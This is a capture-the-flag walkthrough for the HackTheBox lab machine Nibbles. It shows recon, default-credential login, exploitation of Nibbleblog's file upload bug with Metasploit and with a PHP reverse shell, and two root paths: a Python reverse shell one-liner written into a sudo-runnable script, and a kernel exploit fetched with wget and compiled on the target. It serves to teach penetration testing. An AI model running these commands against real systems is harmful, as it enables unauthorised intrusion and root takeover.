Nibbles HackTheBox WalkThrough

This is Nibbles HackTheBox machine walkthrough and is also the 15th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Nibbles HTB machine in two different ways. One using metasploit and other without metasploit. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.75 and difficulty easy assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Nibbles machine by pinging IP 10.10.10.75. If all goes correct then start hacking. As usual, I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-

Scanning

$ nmap -sC -sV -oN Nibbles.nmap 10.10.10.75

Nmap revealed two ports as open. OpenSSH is running on port 22 and apache2 webserver is running over port 80. Since port 80 is open so we should have some website running over it and the website can be accessed at URL http://10.10.10.75. Ongoing to this website found a blank page containing two words Hello World! and nothing is present on this page. As usual, I checked the page source for some hint in the comment section and luckily this time found some interesting comment. The comment contains URI of this website which is /nibbleblog/.

Now, we have a new URL to explore over, viz. http://10.10.10.75/nibbleblog/. This URL has nibbleblog CMS installed to it. When I get any CMS then my next step is to check whether the CMS is open source or closed source, its version number and then search for available vulnerability and its exploit on exploit-db using searchsploit. If it is open source CMS then we can simply get its source code at GitHub and check its directory structure as well as file & folder names. This prevents us from bruteforcing for files & folders on our target website. We can also search for the particular file at the website which we see on GitHub.

A simple googling revealed that it is an open source CMS and its source code is present at GitHub. After some further enumeration got version of this CMS a https://10.10.10.75/nibbleblog/update.php.

So we have Nibbleblog v4.0.3. Now we can simply search for available exploits for this version through searchsploit (tool to query exploit-db).

Searching for available exploit

$ searchsploit nibbleblog 4.0.3

Searchsploit revealed that this version is effected with Arbitrary File Upload and there is also a metasploit module available for this exploit. Let us check the requirement for this module and exploit this vulnerability using metasploit.

$ sudo msfdb run

msf6 > search nibbleblog

mdf6 > info use exploit/multi/http/nibbleblog_file_upload

The metasploit module is exploit/multi/http/nibbleblog_file_upload. This module requires username and password to work. But we don’t have any credentials enumerated so far. Since this is a CMS just like we have WordPress so there should also be a login panel that is used to manage this website. After some more enumeration got login panel at http://10.10.10.75/nibbleblog/admin.php. Tried some default credentials like admin: admin, admin: password, admin: nibbles and luckily admin: nibbles worked. So we have got the credential of admin user. Now we can exploit this vulnerability using metasploit to gain access to nibbles box. I exploited this vulnerability in two different ways. First through metasploit and second without metasploit. Let us get user shell using metasploit.

Getting User Shell Using Metasploit – Method 1

msf6 > use exploit/multi/http/nibbleblog_file_upload

msf6 exploit(multi/http/nibbleblog_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75

msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.3

msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/

msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin

msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles

msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

We have got user shell using metasploit. Let us exploit this vulnerability without metasploit. You can get more information about this vulnerability and its PoC from here. According to this file upload vulnerability an attacker can upload any malicious script using My image plugin and can execute it because any file uploaded through My Image plugin saves it as its original extension. Check this snippet from curesec.com

Getting User Shell Without Metasploit – Method 2

To get user shell do the following things.

1. Log in into admin panel at http://10.10.10.75/nibbleblog/admin.php using the credential admin: nibbles.

2. Click on Plugins on left pane and click on configure under My Image plugin name.

3. Upload php-reverse-shell.php and click on Save changes to apply the changes. Php webshell can be found in the directory /usr/share/webshells/php/. Don’t forget to replace the IP address of shell by your tun0 IP before uploading.

4. Start netcat listener on kali machine to accept the reverse connection from this php shell.

5. Access URL http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php  to execute the shell. That’s all, you will have a shell now.

1. Login into admin

2. Click on plugins and then Configure under My Image

3. Upload the shell.

4. Start netcat listener

$ nc -nvlp 8888

5. Execute the uploaded shell

$ curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

6. Check the user and its ID after getting shell.

$ whoami && id

We have got a user shell. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ ^Z #Press CTRL+Z to background the shell

$ stty raw -echo

$ fg # And press two times enter to foreground the shell

Capture User Flag

$cat /home/nibbler/user.txt

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. There are two ways by which you can find privilege escalation vector. Either use some post exploitation enumeration scripts like Linpeas, LinEnum, linux-exploit-suggester, etc. or perform enumeration manually.

Finding PrivEsc Vector

sudo -l command revealed that user nibbler can run monitor.sh as root user, which means that any command that requires root privilege to execute if put inside the script monitor.sh can be executed by user nibbler without asking password. Suppose if we are putting some command like $ sudo python3 inside this file then if we run this script as root user it won’t ask for password.

$ sudo -l

monitor.sh file is present inside the personal.zip folder. So we have to unzip personal.zip to execute monitor.sh script. If you don’t want to unzip this folder you can simply create another monitor.sh file inside directory personal/stuff/. But you have to create personal and stuff folder also because they are not previously present.  I am going to use the same monitor.sh which I got after unzipping personal.zip.

$ unzip personal.zip

monitor.sh script can be read, write and executed by user nibbler because it has rwx permission.

$ find . -ls

Since user nibbler can modify this file so he can also put some reverse shell code into this file and if this file will be run as root then the reverse shell code will also be executed as root and we can get shell on our netcat listener. I did the same things and got root shell. So here our privilege escalation vector is getting root by Sudo Right Exploitation.

This box is also vulnerable to kernel exploit which I came to know when I ran linux-exploit-suggester to find some privilege escalation vector. For more information about this kernel exploit check CVE-2017-16995. So we have also two ways to root this box and that’s what we are going to do the very next. First by using Sudo Right Exploitation and second by using Kernel Exploit.

Getting Root Shell via Sudo Right Exploitation – Method 1

To get root shell I did the following things.

On Kali Machine

1. Started netcat listener.

$ nc -nvlp 1234

On Nibbles Machine

2. Changed the directory to personal/stuff/ [Make sure you have already extracted the folder personal.zip or have created the file monitor.sh]

3. Put the following reverse shell code into monitor.sh

sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4. Execute the script as root. Ignore the connection time-out error.

$ cd personal/stuff/

$ nano monitor.sh

$ grep -i "sudo python3" monitor.sh

$ sudo -u root ./monitor.sh

We are root now.

Getting Root Shell via Kernel Exploit – Method 2

To get root shell via Kernel Exploit I did the following things.

On Kali Machine

1. Downloaded the exploit from exploit-db.

2. Started python http server to host this file

$ curl https://www.exploit-db.com/download/45010 -o exploit.c

$ sudo python3 -m http.server 80

On Nibbles Machine

4. Changed the directory to public writable directory viz., /dev/shm

5. Downloaded the exploit from my kali machine

6. Compiled the exploit

7. Finally run it.

$ cd /dev/shm

$ wget http://10.10.14.3/exploit.c

$ gcc exploit.c

$ ./a.out

# whoami

We have successfully got root. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

This was how I rooted to the Nibbles HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. For any query and suggestion about the writeup feel free to write us at [email protected].